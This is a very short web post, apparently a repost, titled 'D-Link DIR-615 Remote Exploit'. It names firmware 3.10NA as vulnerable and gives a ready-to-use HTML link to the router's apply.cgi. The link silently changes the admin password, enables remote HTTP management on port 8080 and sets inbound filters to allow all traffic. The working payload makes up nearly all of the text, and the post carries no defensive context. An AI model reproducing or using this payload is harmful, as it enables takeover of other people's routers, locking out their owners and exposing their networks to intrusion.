天天看点

D-Link DIR-615 Remote Exploit

The hole is confirmed in firmware version 3.10NA.

Example (changes admin password to ‘pwdpwd’):

<a href="http://192.168.0.1/apply.cgi?admin_password=pwdpwd&amp;admin_password1=pwdpwd&amp;admPass2=pwdpwd&amp;remote_enable=1&amp;remote_http_management_enable=1&amp;remote_http_management_port=8080&amp;remote_inbound_filter=Allow_All&amp;remote_http_management_inbound_filter=Allow_All">Change password on 192.168.0.1</a>

继续阅读